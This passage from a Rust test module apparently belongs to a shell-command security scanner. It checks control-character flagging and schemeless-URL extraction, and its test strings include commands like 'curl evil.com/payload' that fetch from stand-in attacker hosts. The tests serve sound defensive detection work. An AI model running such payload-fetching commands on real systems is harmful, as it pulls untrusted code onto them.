            result.has_control_chars,
            "attack \\r mixed with \\r\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_only_cr() {
        let result = scan_bytes(b"\r");
        assert!(
            !result.has_control_chars,
            "lone trailing \\r should not be flagged"
        );
    }

    // --- schemeless-host heuristics and output-flag skipping ---

    #[test]
    fn test_schemeless_skip_curl_output_flag() {
        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "lenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_curl_output_combined() {
        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-olenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_output_flag() {
        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "output.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_combined() {
        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-Ooutput.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_real_domain_still_detected() {
        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.com/payload should be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_png_no_slash_is_file() {
        assert!(!looks_like_schemeless_host("lenna.png"));
    }

    #[test]
    fn test_schemeless_tld_overlap_with_path_is_domain() {
        assert!(looks_like_schemeless_host("evil.zip/payload"));
        assert!(looks_like_schemeless_host("evil.sh/payload"));
    }

    #[test]
    fn test_schemeless_tld_overlap_without_path_is_file() {
        assert!(!looks_like_schemeless_host("lenna.zip"));
        assert!(!looks_like_schemeless_host("script.sh"));
    }

    #[test]
    fn test_schemeless_tld_overlap_sink_context_detected() {
        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.zip/payload should be detected as schemeless URL in sink context"
        );
    }
}